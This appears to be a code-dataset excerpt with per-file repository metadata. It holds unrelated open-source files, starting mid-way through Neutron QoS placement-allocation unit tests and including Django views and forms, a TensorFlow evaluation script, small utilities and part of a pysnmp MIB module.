self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 500}})
def test_change_placement_allocation_decrease(self):
original_qos = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
original_qos, desired_qos, original_min_kbps=2000,
desired_min_kbps=1000, is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
original_qos, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_decrease_min_pps(self):
original_qos = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
original_qos, desired_qos, original_min_kpps=2000,
desired_min_kpps=1000, is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
original_qos, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_no_original_qos(self):
qos1 = None
qos2 = self._make_qos_policy()
rule2_obj = self._make_qos_minbw_rule(qos2.id, min_kbps=1000)
qos2.rules = [rule2_obj]
orig_port = {'id': 'u:u', 'device_id': 'i:d', 'binding:profile': {}}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_no_original_allocation(self):
qos1 = self._make_qos_policy()
rule1_obj = self._make_qos_minbw_rule(qos1.id, min_kbps=500)
qos1.rules = [rule1_obj]
qos2 = self._make_qos_policy()
rule2_obj = self._make_qos_minbw_rule(qos2.id, min_kbps=1000)
qos2.rules = [rule2_obj]
orig_port = {'id': 'u:u', 'device_id': 'i:d', 'binding:profile': {}}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_new_policy_empty(self):
qos1 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(qos1,
original_min_kbps=1000, original_min_kpps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, None, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000},
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': -2000}})
def test_change_placement_allocation_no_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
bw_limit_rule1 = rule_object.QosDscpMarkingRule(dscp_mark=16)
bw_limit_rule2 = rule_object.QosDscpMarkingRule(dscp_mark=18)
qos1.rules = [bw_limit_rule1]
qos2.rules = [bw_limit_rule2]
orig_port = {
'binding:profile': {'allocation': {
self.MIN_BW_REQUEST_GROUP_UUID: self.MIN_BW_RP}},
'device_id': 'uu:id',
'id': '9416c220-160a-11ec-ba3d-474633eb825c',
}
port = {}
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, None, orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_old_rule_not_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
bw_limit_rule = rule_object.QosDscpMarkingRule(dscp_mark=16)
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, desired_min_kbps=2000)
qos1.rules = [bw_limit_rule]
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(qos1, qos2, orig_port,
port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_new_rule_not_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
bw_limit_rule = rule_object.QosDscpMarkingRule(dscp_mark=16)
qos2.rules = [bw_limit_rule]
orig_port, port = self._prepare_port_for_placement_allocation(qos1,
original_min_kbps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': -1000}})
def test_change_placement_allocation_equal_minkbps_and_minkpps(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=1000,
original_min_kpps=1000, desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_not_called()
def test_change_placement_allocation_update_conflict(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
mock_update_qos_alloc.side_effect = ks_exc.Conflict(
response={'errors': [{'code': 'placement.concurrent_update'}]}
)
self.assertRaises(
neutron_qos_exc.QosPlacementAllocationUpdateConflict,
self.qos_plugin._change_placement_allocation,
qos1, qos2, orig_port, port)
def test_change_placement_allocation_update_generation_conflict(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
mock_update_qos_alloc.side_effect = (
pl_exc.PlacementAllocationGenerationConflict(
consumer=self.MIN_BW_RP))
self.assertRaises(
pl_exc.PlacementAllocationGenerationConflict,
self.qos_plugin._change_placement_allocation,
qos1, qos2, orig_port, port)
def test_change_placement_allocation_qos_network_policy(self):
qos_network = self._make_qos_policy()
desired_qos = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
None, desired_qos, qos_network_policy=qos_network,
original_min_kbps=1000, desired_min_kbps=2000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos_network, desired_qos, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
| 45.742969 | 79 | 0.617556 | 126,419 | 0.983867 | 0 | 0 | 13,018 | 0.101314 | 0 | 0 | 18,391 | 0.14313 |
b9ef252652f99c5c9feffaab6f06bdbb7fe7dd89 | 953 | py | Python | covfefe/covfefe.py | fixator10/Trusty-cogs | 3d47a63f562cb64eb44da6bb53cfe9f8324026e7 | [
"MIT"
] | 148 | 2017-04-23T19:57:50.000Z | 2022-03-12T06:59:58.000Z | covfefe/covfefe.py | mina9999/Trusty-cogs | a47de7c233f3c1802effd29f4a86f8a9b0e2b34a | [
"MIT"
] | 155 | 2018-01-01T13:27:45.000Z | 2022-03-12T05:17:51.000Z | covfefe/covfefe.py | mina9999/Trusty-cogs | a47de7c233f3c1802effd29f4a86f8a9b0e2b34a | [
"MIT"
] | 221 | 2017-04-02T00:26:08.000Z | 2022-03-26T15:06:54.000Z | import re
import discord
from redbot.core import commands
class Covfefe(commands.Cog):
"""
Convert almost any word into covfefe
"""
def __init__(self, bot):
self.bot = bot
async def covfefe(self, x, k="aeiouy])"):
"""
https://codegolf.stackexchange.com/a/123697
"""
try:
b, c, v = re.findall(f"(.*?[{k}([^{k}.*?([{k}", x)[0]
return b + c + (("bcdfgkpstvz" + c)["pgtvkgbzdfs".find(c)] + v) * 2
except IndexError:
return None
async def red_delete_data_for_user(self, **kwargs):
"""
Nothing to delete
"""
return
@commands.command()
async def covefy(self, ctx, msg):
"""Convert almost any word into covfefe"""
newword = await self.covfefe(msg)
if newword is not None:
await ctx.send(newword)
else:
await ctx.send("I cannot covfefeify that word")
| 24.435897 | 79 | 0.541448 | 891 | 0.934942 | 0 | 0 | 292 | 0.306401 | 711 | 0.746065 | 294 | 0.308499 |
b9ef44f166a7664004d3feffe782db268867e247 | 1,487 | py | Python | src/api/bkuser_core/audit/views.py | trueware/bk-user | 8c633e0a3821beb839ed120c4514c5733e675862 | [
"MIT"
] | null | null | null | src/api/bkuser_core/audit/views.py | trueware/bk-user | 8c633e0a3821beb839ed120c4514c5733e675862 | [
"MIT"
] | null | null | null | src/api/bkuser_core/audit/views.py | trueware/bk-user | 8c633e0a3821beb839ed120c4514c5733e675862 | [
"MIT"
] | 1 | 2021-12-31T06:48:41.000Z | 2021-12-31T06:48:41.000Z | # -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from bkuser_core.common.viewset import AdvancedListAPIView, AdvancedModelViewSet
from . import serializers as local_serializers
from .models import GeneralLog, LogIn, ResetPassword
class GeneralLogViewSet(AdvancedModelViewSet, AdvancedListAPIView):
queryset = GeneralLog.objects.all()
serializer_class = local_serializers.GeneralLogSerializer
lookup_field = "id"
class LoginLogViewSet(AdvancedModelViewSet, AdvancedListAPIView):
queryset = LogIn.objects.all()
serializer_class = local_serializers.LoginLogSerializer
lookup_field = "id"
class ResetPasswordLogViewSet(AdvancedModelViewSet, AdvancedListAPIView):
queryset = ResetPassword.objects.all()
serializer_class = local_serializers.ResetPasswordLogSerializer
lookup_field = "id"
| 45.060606 | 115 | 0.799597 | 585 | 0.389222 | 0 | 0 | 0 | 0 | 0 | 0 | 737 | 0.490353 |
b9ef4b5c2209cb05949e60eccf8cd9158602e350 | 4,784 | py | Python | exp_gqa/test.py | ronghanghu/gqa_single_hop_baseline | 332d342da60dfefd40f2364d60215ed2f191aa2d | [
"BSD-2-Clause"
] | 19 | 2019-08-19T18:09:26.000Z | 2021-08-29T15:58:30.000Z | exp_gqa/test.py | ronghanghu/gqa_single_hop_baseline | 332d342da60dfefd40f2364d60215ed2f191aa2d | [
"BSD-2-Clause"
] | 1 | 2019-11-24T14:36:29.000Z | 2019-12-11T08:33:12.000Z | exp_gqa/test.py | ronghanghu/gqa_single_hop_baseline | 332d342da60dfefd40f2364d60215ed2f191aa2d | [
"BSD-2-Clause"
] | 1 | 2019-10-30T05:55:52.000Z | 2019-10-30T05:55:52.000Z | import os
import numpy as np
import tensorflow as tf
from models_gqa.model import Model
from models_gqa.config import build_cfg_from_argparse
from util.gqa_train.data_reader import DataReader
import json
# Load config
cfg = build_cfg_from_argparse()
# Start session
os.environ["CUDA_VISIBLE_DEVICES"] = str(cfg.GPU_ID)
sess = tf.Session(config=tf.ConfigProto(
gpu_options=tf.GPUOptions(allow_growth=cfg.GPU_MEM_GROWTH)))
# Data files
imdb_file = cfg.IMDB_FILE % cfg.TEST.SPLIT_VQA
scene_graph_file = cfg.SCENE_GRAPH_FILE % \
cfg.TEST.SPLIT_VQA.replace('_balanced', '').replace('_all', '')
data_reader = DataReader(
imdb_file, shuffle=False, one_pass=True, batch_size=cfg.TEST.BATCH_SIZE,
T_encoder=cfg.T_ENCODER,
vocab_question_file=cfg.VOCAB_QUESTION_FILE,
vocab_answer_file=cfg.VOCAB_ANSWER_FILE,
feature_type=cfg.FEAT_TYPE,
spatial_feature_dir=cfg.SPATIAL_FEATURE_DIR,
objects_feature_dir=cfg.OBJECTS_FEATURE_DIR,
objects_max_num=cfg.W_FEAT,
scene_graph_file=scene_graph_file,
vocab_name_file=cfg.VOCAB_NAME_FILE,
vocab_attr_file=cfg.VOCAB_ATTR_FILE,
spatial_pos_enc_dim=cfg.SPATIAL_POS_ENC_DIM,
bbox_tile_num=cfg.BBOX_TILE_NUM)
num_vocab = data_reader.batch_loader.vocab_dict.num_vocab
num_choices = data_reader.batch_loader.answer_dict.num_vocab
# Inputs and model
input_seq_batch = tf.placeholder(tf.int32, [None, None])
seq_length_batch = tf.placeholder(tf.int32, [None])
image_feat_batch = tf.placeholder(
tf.float32, [None, cfg.H_FEAT, cfg.W_FEAT, cfg.D_FEAT])
image_valid_batch = tf.placeholder(
tf.float32, [None, cfg.H_FEAT, cfg.W_FEAT])
model = Model(
input_seq_batch, seq_length_batch, image_feat_batch, image_valid_batch,
num_vocab=num_vocab, num_choices=num_choices, is_training=False)
# Load snapshot
if cfg.TEST.USE_EMA:
ema = tf.train.ExponentialMovingAverage(decay=0.9) # decay doesn't matter
var_names = {
(ema.average_name(v) if v in model.params else v.op.name): v
for v in tf.global_variables()}
else:
var_names = {v.op.name: v for v in tf.global_variables()}
snapshot_file = cfg.TEST.SNAPSHOT_FILE % (cfg.EXP_NAME, cfg.TEST.ITER)
print('loading model snapshot from %s' % snapshot_file)
snapshot_saver = tf.train.Saver(var_names)
snapshot_saver.restore(sess, snapshot_file)
print('Done')
# Write results
result_dir = cfg.TEST.RESULT_DIR % (cfg.EXP_NAME, cfg.TEST.ITER)
os.makedirs(result_dir, exist_ok=True)
# Run test
answer_correct, num_questions = 0, 0
if cfg.TEST.OUTPUT_VQA_EVAL_PRED:
output_predictions = []
answer_word_list = data_reader.batch_loader.answer_dict.word_list
pred_file = os.path.join(
result_dir, 'gqa_eval_preds_%s_%s_%08d.json' % (
cfg.TEST.SPLIT_VQA, cfg.EXP_NAME, cfg.TEST.ITER))
for n_batch, batch in enumerate(data_reader.batches()):
if 'answer_label_batch' not in batch:
batch['answer_label_batch'] = -np.ones(
len(batch['qid_list']), np.int32)
if num_questions == 0:
print('imdb has no answer labels. Using dummy labels.\n\n'
'**The final accuracy will be zero (no labels provided)**\n')
vqa_scores_value = sess.run(model.vqa_scores, feed_dict={
input_seq_batch: batch['input_seq_batch'],
seq_length_batch: batch['seq_length_batch'],
image_feat_batch: batch['image_feat_batch'],
image_valid_batch: batch['image_valid_batch']})
# compute accuracy
vqa_labels = batch['answer_label_batch']
vqa_predictions = np.argmax(vqa_scores_value, axis=1)
answer_correct += np.sum(vqa_predictions == vqa_labels)
num_questions += len(vqa_labels)
accuracy = answer_correct / num_questions
if n_batch % 20 == 0:
print('exp: %s, iter = %d, accumulated accuracy on %s = %f (%d / %d)' %
(cfg.EXP_NAME, cfg.TEST.ITER, cfg.TEST.SPLIT_VQA,
accuracy, answer_correct, num_questions))
if cfg.TEST.OUTPUT_VQA_EVAL_PRED:
output_predictions.extend([
{"questionId": qId, "prediction": answer_word_list[p]}
for qId, p in zip(batch['qid_list'], vqa_predictions)])
with open(os.path.join(
result_dir, 'vqa_results_%s.txt' % cfg.TEST.SPLIT_VQA), 'w') as f:
print('\nexp: %s, iter = %d, final accuracy on %s = %f (%d / %d)' %
(cfg.EXP_NAME, cfg.TEST.ITER, cfg.TEST.SPLIT_VQA,
accuracy, answer_correct, num_questions))
print('exp: %s, iter = %d, final accuracy on %s = %f (%d / %d)' %
(cfg.EXP_NAME, cfg.TEST.ITER, cfg.TEST.SPLIT_VQA,
accuracy, answer_correct, num_questions), file=f)
if cfg.TEST.OUTPUT_VQA_EVAL_PRED:
with open(pred_file, 'w') as f:
json.dump(output_predictions, f, indent=2)
print('prediction file written to %s' % pred_file)
| 40.201681 | 79 | 0.713002 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 775 | 0.161998 |
b9efb93e53325ce5948d495ecf3a99ce26893591 | 2,071 | py | Python | extract_gear/armor_visitor.py | kamerons/dde-extract-gear | 44464ae470bd5de6279d32e3587b469ce006ea42 | [
"Apache-2.0"
] | null | null | null | extract_gear/armor_visitor.py | kamerons/dde-extract-gear | 44464ae470bd5de6279d32e3587b469ce006ea42 | [
"Apache-2.0"
] | null | null | null | extract_gear/armor_visitor.py | kamerons/dde-extract-gear | 44464ae470bd5de6279d32e3587b469ce006ea42 | [
"Apache-2.0"
] | null | null | null | class ArmorVisitor:
def __init__(self, num_pages, first_page_col_start, first_page_row_start,
last_page_row_start, last_page_col_end, last_page_row_end, num_col_page=5, num_row_page=3):
self.num_pages = num_pages
self.first_page_col_start = first_page_col_start
self.first_page_row_start = first_page_row_start
self.last_page_row_start = last_page_row_start
self.last_page_col_end = last_page_col_end
self.last_page_row_end = last_page_row_end
self.num_col_page = num_col_page
self.num_row_page = num_row_page
def iterate(self, callback):
for page_num in range(1, self.num_pages + 1):
page = self.create_page(page_num)
i = 0
for coord in page:
callback(coord, page_num, i)
i += 1
def create_page(self, page_num):
if page_num == 1:
last_col = self.num_col_page if self.num_pages > 1 else self.last_page_col_end
last_row = self.num_row_page if self.num_pages > 1 else self.last_page_row_end
page = Page(self.first_page_col_start, self.first_page_row_start, last_col, last_row, self.num_col_page)
elif page_num == self.num_pages:
page = Page(1, self.last_page_row_start,
self.last_page_col_end, self.last_page_row_end, self.num_col_page)
else:
page = Page(1, 1, self.num_col_page, self.num_row_page, self.num_col_page)
return page
class Page:
def __init__(self, start_col, start_row, last_col, last_row, num_col_page=5):
self.start_col = start_col
self.start_row = start_row
self.last_col = last_col
self.last_row = last_row
self.num_col_page = num_col_page
def __iter__(self):
self.cur_row = self.start_row
self.cur_col = self.start_col
return self
def __next__(self):
position = (self.cur_row, self.cur_col)
if self.cur_row > self.last_row or (self.cur_col > self.last_col and self.cur_row == self.last_row):
raise StopIteration
elif self.cur_col == self.num_col_page:
self.cur_col = 1
self.cur_row += 1
else:
self.cur_col += 1
return position
| 32.873016 | 110 | 0.718493 | 2,067 | 0.998069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
b9f15c3b93c89d0226f4f6b8fd7503987d856e88 | 542 | py | Python | gamla/url_utils_test.py | hyroai/gamla | bfa05807685bd51cba7c4c9cc47f1f5e73e6f7ee | [
"MIT"
] | 17 | 2020-03-19T08:40:39.000Z | 2022-03-06T14:43:35.000Z | gamla/url_utils_test.py | hyroai/gamla | bfa05807685bd51cba7c4c9cc47f1f5e73e6f7ee | [
"MIT"
] | 39 | 2020-04-13T16:52:43.000Z | 2022-03-24T08:30:49.000Z | gamla/url_utils_test.py | uriva/gamla | 65b450a7761cbc13bdbc7a4216003932f18cf433 | [
"MIT"
] | 2 | 2019-11-13T15:13:51.000Z | 2019-12-10T15:19:04.000Z | from gamla import url_utils
def test_add_to_query_string1():
assert (
url_utils.add_to_query_string(
{"a": 123},
"https://www.domain.com/path?param1=param1#anchor",
)
== "https://www.domain.com/path?param1=param1&a=123#anchor"
)
def test_add_to_query_string2():
assert (
url_utils.add_to_query_string(
{"param1": 123},
"https://www.domain.com/path?param1=param1#anchor",
)
== "https://www.domain.com/path?param1=123#anchor"
)
| 24.636364 | 67 | 0.586716 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 214 | 0.394834 |
b9f25a250dce61318cad2d5bfa0bebb70f70d2dc | 1,071 | py | Python | examples/temp_feie_shetland.py | nilsmkMET/roppy | c68d698fa4970174af2c7f7137bd4a3e5983b644 | [
"MIT"
] | null | null | null | examples/temp_feie_shetland.py | nilsmkMET/roppy | c68d698fa4970174af2c7f7137bd4a3e5983b644 | [
"MIT"
] | null | null | null | examples/temp_feie_shetland.py | nilsmkMET/roppy | c68d698fa4970174af2c7f7137bd4a3e5983b644 | [
"MIT"
] | null | null | null | import numpy as np
from netCDF4 import Dataset
# Import development version of roppy
import sys
sys.path = ['..'] + sys.path
import roppy
# --- EDIT -----------------
# ROMS file
romsfile = 'data/ocean_avg_example.nc'
# Section definition
lon0, lat0 = -0.67, 60.75 # Shetland
lon1, lat1 = 4.72, 60.75 # Feie
# --- EDIT ------------------
# Make a grid object
f = Dataset(romsfile)
grd = roppy.SGrid(f)
# Get grid coordinates of end points
x0, y0 = grd.ll2xy(lon0, lat0)
x1, y1 = grd.ll2xy(lon1, lat1)
# Find nearest rho-points
i0, j0, i1, j1 = [int(round(v)) for v in x0, y0, x1, y1]
# Make a Section object
sec = roppy.linear_section(i0, i1, j0, j1, grd)
# Read in a 3D temperature field
temp = f.variables['temp'][0,:,:,:]
# Interpolate to the section
temp_sec = sec.sample3D(temp)
# Compute mean temperature along section
# using trapezoidal integration
print "mean tempeature = ", np.sum(sec.Area * temp_sec) / np.sum(sec.Area)
# TODO: Make a mean method in the Section class
# Usage: sec.mean(temp_sec)
# or even directly from 3D: sec.mean(temp)
| 22.787234 | 74 | 0.6676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 553 | 0.51634 |
b9f401385afbe018601c2bef20e53c9b587fb7df | 485 | py | Python | examples/test_scalar_field.py | gemini3d/pv-gemini | 99dff15b43a2c93cbcb63d2f8946d425d0555ef3 | [
"Apache-2.0"
] | null | null | null | examples/test_scalar_field.py | gemini3d/pv-gemini | 99dff15b43a2c93cbcb63d2f8946d425d0555ef3 | [
"Apache-2.0"
] | null | null | null | examples/test_scalar_field.py | gemini3d/pv-gemini | 99dff15b43a2c93cbcb63d2f8946d425d0555ef3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
"""
example of 3D scalar field
If you get this error, ParaView doesn't know your data file format:
TypeError: TestFileReadability argument %Id: %V
"""
from pathlib import Path
import argparse
import paraview.simple as pvs
p = argparse.ArgumentParser()
p.add_argument("fn", help="data file to load with paraview OpenDataFile()")
P = p.parse_args()
fn = Path(P.fn).expanduser()
if not fn.is_file():
raise FileNotFoundError(fn)
pvs.OpenDataFile(str(fn))
| 20.208333 | 75 | 0.740206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 225 | 0.463918 |
b9f4182f4b0683cbf4f51c72cef042f5acb55553 | 341 | py | Python | src/cms/forms/languages/language_form.py | S10MC2015/cms-django | b08f2be60a9db6c8079ee923de2cd8912f550b12 | [
"Apache-2.0"
] | null | null | null | src/cms/forms/languages/language_form.py | S10MC2015/cms-django | b08f2be60a9db6c8079ee923de2cd8912f550b12 | [
"Apache-2.0"
] | null | null | null | src/cms/forms/languages/language_form.py | S10MC2015/cms-django | b08f2be60a9db6c8079ee923de2cd8912f550b12 | [
"Apache-2.0"
] | null | null | null | from django import forms
from ...models import Language
class LanguageForm(forms.ModelForm):
"""
Form for creating and modifying language objects
"""
class Meta:
model = Language
fields = [
"code",
"english_name",
"native_name",
"text_direction",
]
| 17.947368 | 52 | 0.548387 | 281 | 0.824047 | 0 | 0 | 0 | 0 | 0 | 0 | 113 | 0.331378 |
b9f437d2e63f9838da4ffa0491804e95e149a773 | 1,482 | py | Python | search/forms.py | gregneagle/sal | 74c583fb1c1b33d3201b308b147376b3dcaca33f | [
"Apache-2.0"
] | 2 | 2019-11-01T20:50:35.000Z | 2021-01-13T22:02:55.000Z | search/forms.py | gregneagle/sal | 74c583fb1c1b33d3201b308b147376b3dcaca33f | [
"Apache-2.0"
] | null | null | null | search/forms.py | gregneagle/sal | 74c583fb1c1b33d3201b308b147376b3dcaca33f | [
"Apache-2.0"
] | null | null | null | from django import forms
from .models import *
from server.models import *
class ChoiceFieldNoValidation(forms.ChoiceField):
def validate(self, value):
pass
class SaveSearchForm(forms.ModelForm):
class Meta:
model = SavedSearch
fields = ('name',)
class SearchRowForm(forms.ModelForm):
skip_fields = [
'id',
'machine_group',
'report',
'activity',
'errors',
'warnings',
'install_log',
'puppet_errors',
'install_log_hash'
]
search_fields = []
for f in Machine._meta.fields:
if f.name not in skip_fields:
add = (f.name,f.name,)
search_fields.append(add)
search_field = ChoiceFieldNoValidation(choices=sorted(search_fields))
and_or = ChoiceFieldNoValidation(choices=AND_OR_CHOICES)
def __init__(self, *args, **kwargs):
self.search_group = kwargs.pop('search_group', None)
super(SearchRowForm, self).__init__(*args, **kwargs)
try:
search_group_count = self.search_group.searchrow_set.count()
except:
search_group_count = 0
if search_group_count == 0 and self.search_group:
self.fields['and_or'] = ChoiceFieldNoValidation(
initial='AND',
widget=forms.HiddenInput()
)
class Meta:
model = SearchRow
fields = ('search_models', 'search_field', 'and_or', 'operator','search_term',)
| 27.962264 | 87 | 0.609312 | 1,400 | 0.944669 | 0 | 0 | 0 | 0 | 0 | 0 | 194 | 0.130904 |
b9f59c6c5e552b8bde064c8fa9f25427a65b2006 | 158,531 | py | Python | pysnmp-with-texts/InternetThruway-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/InternetThruway-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/InternetThruway-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module InternetThruway-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/InternetThruway-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:58:27 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, ObjectIdentity, Counter64, Gauge32, NotificationType, Bits, NotificationType, MibIdentifier, TimeTicks, enterprises, ModuleIdentity, iso, Integer32, Unsigned32, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "ObjectIdentity", "Counter64", "Gauge32", "NotificationType", "Bits", "NotificationType", "MibIdentifier", "TimeTicks", "enterprises", "ModuleIdentity", "iso", "Integer32", "Unsigned32", "Counter32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
nortel = MibIdentifier((1, 3, 6, 1, 4, 1, 562))
dialaccess = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14))
csg = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2))
system = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 1))
components = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 2))
traps = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 3))
alarms = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 4))
ncServer = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 5))
ss7 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 6))
omData = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7))
disk = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1))
linkOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1))
maintenanceOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 2))
callOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3))
trunkGroupOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4))
phoneNumberOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5))
systemOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6))
nasOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7))
class TimeString(DisplayString):
pass
partitionTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1), )
if mibBuilder.loadTexts: partitionTable.setStatus('mandatory')
if mibBuilder.loadTexts: partitionTable.setDescription('The PartitionTable contains information about each disk partition on the CSG')
partitionTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "partitionIndex"))
